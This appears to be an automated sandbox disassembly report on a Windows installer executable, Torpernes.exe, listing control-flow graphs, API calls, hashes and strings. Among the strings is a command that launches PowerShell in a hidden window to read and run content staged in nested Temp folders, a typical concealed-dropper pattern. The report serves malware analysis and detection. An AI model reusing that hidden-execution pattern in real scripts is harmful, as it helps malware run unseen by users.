4382 404946 21 API calls 4379->4382 4380 404edc SendMessageW 4384 404ef2 4380->4384 4381->4380 4381->4384 4382->4357 4383 404f66 SendMessageW SendMessageW 4383->4384 4384->4378 4384->4383 4385->4377 4386->4341 3685 40173f 3686 402b3a 18 API calls 3685->3686 3687 401746 3686->3687 3688 405ab4 2 API calls 3687->3688 3689 40174d 3688->3689 3690 405ab4 2 API calls 3689->3690 3690->3689

                                            Executed Functions

                                            Function 004031FF Relevance: 77.4, APIs: 27, Strings: 17, Instructions: 383stringfilecomCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 4031ff-403297 #17 SetErrorMode OleInitialize call 406183 SHGetFileInfoW call 405e19 GetCommandLineW call 405e19 GetModuleHandleW 7 4032a0-4032b4 call 405891 CharNextW 0->7 8 403299-40329b 0->8 11 4033af-4033b5 7->11 8->7 12 4032b9-4032bf 11->12 13 4033bb 11->13 14 4032c1-4032c6 12->14 15 4032c8-4032cf 12->15 16 4033cf-4033e9 GetTempPathW call 4031cb 13->16 14->14 14->15 17 4032d1-4032d6 15->17 18 4032d7-4032db 15->18 26 403441-40345b DeleteFileW call 402d69 16->26 27 4033eb-403409 GetWindowsDirectoryW lstrcatW call 4031cb 16->27 17->18 20 4032e1-4032e7 18->20 21 40339c-4033ab call 405891 18->21 24 403301-40333a 20->24 25 4032e9-4032f0 20->25 21->11 38 4033ad-4033ae 21->38 32 403357-403391 24->32 33 40333c-403341 24->33 30 4032f2-4032f5 25->30 31 4032f7 25->31 43 403461-403467 26->43 44 40350c-40351b call 4036d2 OleUninitialize 26->44 27->26 41 40340b-40343b GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4031cb 27->41 30->24 30->31 31->24 36 403393-403397 32->36 37 403399-40339b 32->37 33->32 40 403343-40334b 33->40 36->37 42 4033bd-4033ca call 405e19 36->42 37->21 38->11 45 403352 40->45 46 40334d-403350 40->46 41->26 41->44 42->16 48 4034fc-403503 call 4037ac 43->48 49 40346d-403478 call 405891 43->49 58 403521-403531 call 4055f5 ExitProcess 44->58 59 403617-40361d 44->59 45->32 46->32 46->45 57 403508 48->57 63 4034c6-4034d0 49->63 64 40347a-4034af 49->64 57->44 61 403623-403640 call 406183 * 3 59->61 62 4036ba-4036c2 59->62 92 403642-403644 61->92 93 40368a-403698 call 406183 61->93 68 4036c4 62->68 69 4036c8-4036cc ExitProcess 62->69 66 4034d2-4034e0 call 40596c 63->66 67 403537-403551 lstrcatW lstrcmpiW 63->67 71 4034b1-4034b5 64->71 66->44 82 4034e2-4034f8 call 405e19 * 2 66->82 67->44 73 403553-403569 CreateDirectoryW SetCurrentDirectoryW 67->73 68->69 75 4034b7-4034bc 71->75 76 4034be-4034c2 71->76 78 403576-40359f call 405e19 73->78 79 40356b-403571 call 405e19 73->79 75->76 81 4034c4 75->81 76->71 76->81 91 4035a4-4035c0 call 405e3b DeleteFileW 78->91 79->78 81->63 82->48 102 403601-403609 91->102 103 4035c2-4035d2 CopyFileW 91->103 92->93 96 403646-403648 92->96 105 4036a6-4036b1 ExitWindowsEx 93->105 106 40369a-4036a4 93->106 96->93 100 40364a-40365c GetCurrentProcess 96->100 100->93 113 40365e-403680 100->113 102->91 104 40360b-403612 call 405cb3 102->104 103->102 107 4035d4-4035f4 call 405cb3 call 405e3b call 405590 103->107 104->44 105->62 108 4036b3-4036b5 call 40140b 105->108 106->105 106->108 107->102 122 4035f6-4035fd CloseHandle 107->122 108->62 113->93 122->102
                                            APIs
                                            • #17.COMCTL32 ref: 0040321E
                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403229
                                            • OleInitialize.OLE32(00000000), ref: 00403230
                                              • Part of subcall function 00406183: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000009), ref: 00406195
                                              • Part of subcall function 00406183: LoadLibraryA.KERNELBASE(?,?,00000020,00403242,00000009), ref: 004061A0
                                              • Part of subcall function 00406183: GetProcAddress.KERNEL32(00000000,?), ref: 004061B1
                                            • SHGetFileInfoW.SHELL32(00420670,00000000,?,000002B4,00000000), ref: 00403258
                                              • Part of subcall function 00405E19: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281C0,NSIS Error), ref: 00405E26
                                            • GetCommandLineW.KERNEL32(004281C0,NSIS Error), ref: 0040326D
                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Torpernes.exe",00000000), ref: 00403280
                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Torpernes.exe",00000020), ref: 004032A8
                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004033E0
                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033F1
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033FD
                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403411
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403419
                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040342A
                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403432
                                            • DeleteFileW.KERNELBASE(1033), ref: 00403446
                                            • OleUninitialize.OLE32(?), ref: 00403511
                                            • ExitProcess.KERNEL32 ref: 00403531
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 0040353D
                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Torpernes.exe",00000000,?), ref: 00403549
                                            • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403555
                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040355C
                                            • DeleteFileW.KERNEL32(0041FE70,0041FE70,?,"powershell.exe" -windowstyle hidden,?), ref: 004035B6
                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\Torpernes.exe,0041FE70,00000001), ref: 004035CA
                                            • CloseHandle.KERNEL32(00000000,0041FE70,0041FE70,?,0041FE70,00000000), ref: 004035F7
                                            • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 00403651
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004036A9
                                            • ExitProcess.KERNEL32 ref: 004036CC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                            • String ID: "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatori$"C:\Users\user\Desktop\Torpernes.exe"$"powershell.exe" -windowstyle hidden$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes$C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems$C:\Users\user\Desktop$C:\Users\user\Desktop\Torpernes.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                            • API String ID: 4107622049-495355796
                                            • Opcode ID: a1a8e6abd44abb64edcd91f4bbb04e8a1c5cf9de9732d5afc3bdbc434496ca7e
                                            • Instruction ID: c7a68613e809908f7bc30205db7760ac1a3991b426edab895fb3ee5f362a6f40
                                            • Opcode Fuzzy Hash: a1a8e6abd44abb64edcd91f4bbb04e8a1c5cf9de9732d5afc3bdbc434496ca7e
                                            • Instruction Fuzzy Hash: CEC1E530604210BAD7206F659C49A2B3EACEB45705F10497FF884B62E2DB7D9A41CB6E
                                            Function 00405200 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 123 405200-40521b 124 405221-4052e8 GetDlgItem * 3 call 40405c call 40495e GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 4053aa-4053b1 123->125 147 405306-405309 124->147 148 4052ea-405304 SendMessageW * 2 124->148 127 4053b3-4053d5 GetDlgItem CreateThread FindCloseChangeNotification 125->127 128 4053db-4053e8 125->128 127->128 130 405406-405410 128->130 131 4053ea-4053f0 128->131 132 405412-405418 130->132 133 405466-40546a 130->133 135 4053f2-405401 ShowWindow * 2 call 40405c 131->135 136 40542b-405434 call 40408e 131->136 137 405440-405450 ShowWindow 132->137 138 40541a-405426 call 404000 132->138 133->136 141 40546c-405472 133->141 135->130 144 405439-40543d 136->144 145 405460-405461 call 404000 137->145 146 405452-40545b call 4050c1 137->146 138->136 141->136 149 405474-405487 SendMessageW 141->149 145->133 146->145 152 405319-405330 call 404027 147->152 153 40530b-405317 SendMessageW 147->153 148->147 154 405589-40558b 149->154 155 40548d-4054b8 CreatePopupMenu call 405e3b AppendMenuW 149->155 162 405332-405346 ShowWindow 152->162 163 405366-405387 GetDlgItem SendMessageW 152->163 153->152 154->144 160 4054ba-4054ca GetWindowRect 155->160 161 4054cd-4054e2 TrackPopupMenu 155->161 160->161 161->154 164 4054e8-4054ff 161->164 165 405355 162->165 166 405348-405353 ShowWindow 162->166 163->154 167 40538d-4053a5 SendMessageW * 2 163->167 168 405504-40551f SendMessageW 164->168 169 40535b-405361 call 40405c 165->169 166->169 167->154 168->168 170 405521-405544 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 168->170 169->163 172 405546-40556d SendMessageW 170->172 172->172 173 40556f-405583 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->154
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 0040525E
                                            • GetDlgItem.USER32(?,000003EE), ref: 0040526D
                                            • GetClientRect.USER32(?,?), ref: 004052AA
                                            • GetSystemMetrics.USER32(00000002), ref: 004052B1
                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004052D2
                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004052E3
                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004052F6
                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405304
                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405317
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405339
                                            • ShowWindow.USER32(?,00000008), ref: 0040534D
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040536E
                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040537E
                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405397
                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004053A3
                                            • GetDlgItem.USER32(?,000003F8), ref: 0040527C
                                              • Part of subcall function 0040405C: SendMessageW.USER32(00000028,?,00000001,00403E88), ref: 0040406A
                                            • GetDlgItem.USER32(?,000003EC), ref: 004053C0
                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005194,00000000), ref: 004053CE
                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004053D5
                                            • ShowWindow.USER32(00000000), ref: 004053F9
                                            • ShowWindow.USER32(?,00000008), ref: 004053FE
                                            • ShowWindow.USER32(00000008), ref: 00405448
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040547C
                                            • CreatePopupMenu.USER32 ref: 0040548D
                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004054A1
                                            • GetWindowRect.USER32(?,?), ref: 004054C1
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DA
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405512
                                            • OpenClipboard.USER32(00000000), ref: 00405522
                                            • EmptyClipboard.USER32 ref: 00405528
                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405534
                                            • GlobalLock.KERNEL32(00000000), ref: 0040553E
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405552
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405572
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040557D
                                            • CloseClipboard.USER32 ref: 00405583
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                            • String ID: {
                                            • API String ID: 4154960007-366298937
                                            • Opcode ID: 8b07eba9ac9e112bbeb41a4cd2db4a6c343dd4ab179f28f7181e117c9139910e
                                            • Instruction ID: 1a60e1c93915faf36031e484e8dc4f5f0dc3400a4e98dd575bab4ae93e5693cd
                                            • Opcode Fuzzy Hash: 8b07eba9ac9e112bbeb41a4cd2db4a6c343dd4ab179f28f7181e117c9139910e
                                            • Instruction Fuzzy Hash: 7CB14B71900209FFEB21AF60DD89AAE7B79FB04355F00403AFA05B61A0C7755E52DF69
                                            Function 00405E3B Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207stringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 415 405e3b-405e46 416 405e48-405e57 415->416 417 405e59-405e6f 415->417 416->417 418 405e75-405e82 417->418 419 406087-40608d 417->419 418->419 422 405e88-405e8f 418->422 420 406093-40609e 419->420 421 405e94-405ea1 419->421 423 4060a0-4060a4 call 405e19 420->423 424 4060a9-4060aa 420->424 421->420 425 405ea7-405eb3 421->425 422->419 423->424 427 406074 425->427 428 405eb9-405ef5 425->428 429 406082-406085 427->429 430 406076-406080 427->430 431 406015-406019 428->431 432 405efb-405f06 GetVersion 428->432 429->419 430->419 433 40601b-40601f 431->433 434 40604e-406052 431->434 435 405f20 432->435 436 405f08-405f0c 432->436 437 406021-40602d call 405d60 433->437 438 40602f-40603c call 405e19 433->438 440 406061-406072 lstrlenW 434->440 441 406054-40605c call 405e3b 434->441 439 405f27-405f2e 435->439 436->435 442 405f0e-405f12 436->442 453 406041-40604a 437->453 438->453 445 405f30-405f32 439->445 446 405f33-405f35 439->446 440->419 441->440 442->435 443 405f14-405f18 442->443 443->435 449 405f1a-405f1e 443->449 445->446 451 405f71-405f74 446->451 452 405f37-405f5d call 405ce6 446->452 449->439 456 405f84-405f87 451->456 457 405f76-405f82 GetSystemDirectoryW 451->457 463 405f63-405f6c call 405e3b 452->463 464 405ffc-406000 452->464 453->440 455 40604c 453->455 459 40600d-406013 call 4060ad 455->459 461 405ff2-405ff4 456->461 462 405f89-405f97 GetWindowsDirectoryW 456->462 460 405ff6-405ffa 457->460 459->440 460->459 460->464 461->460 465 405f99-405fa3 461->465 462->461 463->460 464->459 470 406002-406008 lstrcatW 464->470 467 405fa5-405fa8 465->467 468 405fbd-405fd3 SHGetSpecialFolderLocation 465->468 467->468 472 405faa-405fb1 467->472 473 405fd5-405fec SHGetPathFromIDListW CoTaskMemFree 468->473 474 405fee 468->474 470->459 476 405fb9-405fbb 472->476 473->460 473->474 474->461 476->460 476->468
                                            APIs
                                            • GetVersion.KERNEL32(00000000,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,?,004050F8,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,00000000,0040FE60), ref: 00405EFE
                                            • GetSystemDirectoryW.KERNEL32(Execute: ,00000400), ref: 00405F7C
                                            • GetWindowsDirectoryW.KERNEL32(Execute: ,00000400), ref: 00405F8F
                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405FCB
                                            • SHGetPathFromIDListW.SHELL32(?,Execute: ), ref: 00405FD9
                                            • CoTaskMemFree.OLE32(?), ref: 00405FE4
                                            • lstrcatW.KERNEL32(Execute: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00406008
                                            • lstrlenW.KERNEL32(Execute: ,00000000,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,?,004050F8,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,00000000,0040FE60), ref: 00406062
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                            • String ID: "powershell.exe" -windowstyle hidden$Execute: $Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 900638850-2487190391
                                            • Opcode ID: 6ed2ce18e2d539b550dc175a0fdc2c9c6126cdc13d66b6f6a98d78e02c131308
                                            • Instruction ID: 79069b25519764f594e89cf08704c373f390d163d9a81a8315dba2a423a8323b
                                            • Opcode Fuzzy Hash: 6ed2ce18e2d539b550dc175a0fdc2c9c6126cdc13d66b6f6a98d78e02c131308
                                            • Instruction Fuzzy Hash: A761E271A40506ABDF208F25DC44AAF37A5EF50314F21803BE946BA2D0D73D8A92CF5E
                                            Function 004056A1 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 477 4056a1-4056c7 call 40596c 480 4056e0-4056e7 477->480 481 4056c9-4056db DeleteFileW 477->481 483 4056e9-4056eb 480->483 484 4056fa-40570a call 405e19 480->484 482 40585d-405861 481->482 485 4056f1-4056f4 483->485 486 40580b-405810 483->486 490 405719-40571a call 4058b0 484->490 491 40570c-405717 lstrcatW 484->491 485->484 485->486 486->482 489 405812-405815 486->489 492 405817-40581d 489->492 493 40581f-405827 call 40615c 489->493 494 40571f-405723 490->494 491->494 492->482 493->482 501 405829-40583d call 405864 call 405659 493->501 497 405725-40572d 494->497 498 40572f-405735 lstrcatW 494->498 497->498 500 40573a-405756 lstrlenW FindFirstFileW 497->500 498->500 503 405800-405804 500->503 504 40575c-405764 500->504 517 405855-405858 call 4050c1 501->517 518 40583f-405842 501->518 503->486 506 405806 503->506 507 405784-405798 call 405e19 504->507 508 405766-40576e 504->508 506->486 519 40579a-4057a2 507->519 520 4057af-4057ba call 405659 507->520 509 405770-405778 508->509 510 4057e3-4057f3 FindNextFileW 508->510 509->507 513 40577a-405782 509->513 510->504 516 4057f9-4057fa FindClose 510->516 513->507 513->510 516->503 517->482 518->492 521 405844-405853 call 4050c1 call 405cb3 518->521 519->510 522 4057a4-4057ad call 4056a1 519->522 530 4057db-4057de call 4050c1 520->530 531 4057bc-4057bf 520->531 521->482 522->510 530->510 534 4057c1-4057d1 call 4050c1 call 405cb3 531->534 535 4057d3-4057d9 531->535 534->510 535->510
                                            APIs
                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Torpernes.exe"), ref: 004056CA
                                            • lstrcatW.KERNEL32(004246B8,\*.*), ref: 00405712
                                            • lstrcatW.KERNEL32(?,00409014), ref: 00405735
                                            • lstrlenW.KERNEL32(?,?,00409014,?,004246B8,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Torpernes.exe"), ref: 0040573B
                                            • FindFirstFileW.KERNEL32(004246B8,?,?,?,00409014,?,004246B8,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Torpernes.exe"), ref: 0040574B
                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004057EB
                                            • FindClose.KERNEL32(00000000), ref: 004057FA
                                            Strings
                                            • "C:\Users\user\Desktop\Torpernes.exe", xrefs: 004056AA
                                            • \*.*, xrefs: 0040570C
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004056AF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\Torpernes.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-252084881
                                            • Opcode ID: 88fa1dc3ac45dcf4a59ea1ebb406e8f17fdbd40d78c77ddd54cbdf00bcc06bb1
                                            • Instruction ID: 5e0e96141c84f132359e1640c5569076cb8346a5b9e155b5506cdba2f35f624b
                                            • Opcode Fuzzy Hash: 88fa1dc3ac45dcf4a59ea1ebb406e8f17fdbd40d78c77ddd54cbdf00bcc06bb1
                                            • Instruction Fuzzy Hash: 3141B331801A14E6CB217B65CC89ABF7778DB86718F10817BF805722D1D77C4A91EE6E
                                            Function 0040646E Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 765 40646e-406473 766 4064e4-406502 765->766 767 406475-4064a4 765->767 768 406ada-406aef 766->768 769 4064a6-4064a9 767->769 770 4064ab-4064af 767->770 771 406af1-406b07 768->771 772 406b09-406b1f 768->772 773 4064bb-4064be 769->773 774 4064b1-4064b5 770->774 775 4064b7 770->775 776 406b22-406b29 771->776 772->776 777 4064c0-4064c9 773->777 778 4064dc-4064df 773->778 774->773 775->773 782 406b50-406b5c 776->782 783 406b2b-406b2f 776->783 779 4064cb 777->779 780 4064ce-4064da 777->780 781 4066b1-4066cf 778->781 779->780 784 406544-406572 780->784 788 4066d1-4066e5 781->788 789 4066e7-4066f9 781->789 790 4062f2-4062fb 782->790 785 406b35-406b4d 783->785 786 406cde-406ce8 783->786 791 406574-40658c 784->791 792 40658e-4065a8 784->792 785->782 794 406cf4-406d07 786->794 793 4066fc-406706 788->793 789->793 795 406301 790->795 796 406d09 790->796 797 4065ab-4065b5 791->797 792->797 799 406708 793->799 800 4066a9-4066af 793->800 798 406d0c-406d10 794->798 802 406308-40630c 795->802 803 406448-406469 795->803 804 4063ad-4063b1 795->804 805 40641d-406421 795->805 796->798 807 4065bb 797->807 808 40652c-406532 797->808 816 406c90-406c9a 799->816 817 40668e-4066a6 799->817 800->781 806 40664d-406657 800->806 802->794 809 406312-40631f 802->809 803->768 818 4063b7-4063d0 804->818 819 406c5d-406c67 804->819 810 406427-40643b 805->810 811 406c6c-406c76 805->811 812 406c9c-406ca6 806->812 813 40665d-406826 806->813 824 406511-406529 807->824 825 406c78-406c82 807->825 814 4065e5-4065eb 808->814 815 406538-40653e 808->815 809->796 823 406325-40636b 809->823 826 40643e-406446 810->826 811->794 812->794 813->790 821 406649 814->821 822 4065ed-40660b 814->822 815->784 815->821 816->794 817->800 828 4063d3-4063d7 818->828 819->794 821->806 829 406623-406635 822->829 830 40660d-406621 822->830 831 406393-406395 823->831 832 40636d-406371 823->832 824->808 825->794 826->803 826->805 828->804 833 4063d9-4063df 828->833 836 406638-406642 829->836 830->836 839 4063a3-4063ab 831->839 840 406397-4063a1 831->840 837 406373-406376 GlobalFree 832->837 838 40637c-40638a GlobalAlloc 832->838 834 4063e1-4063e8 833->834 835 406409-40641b 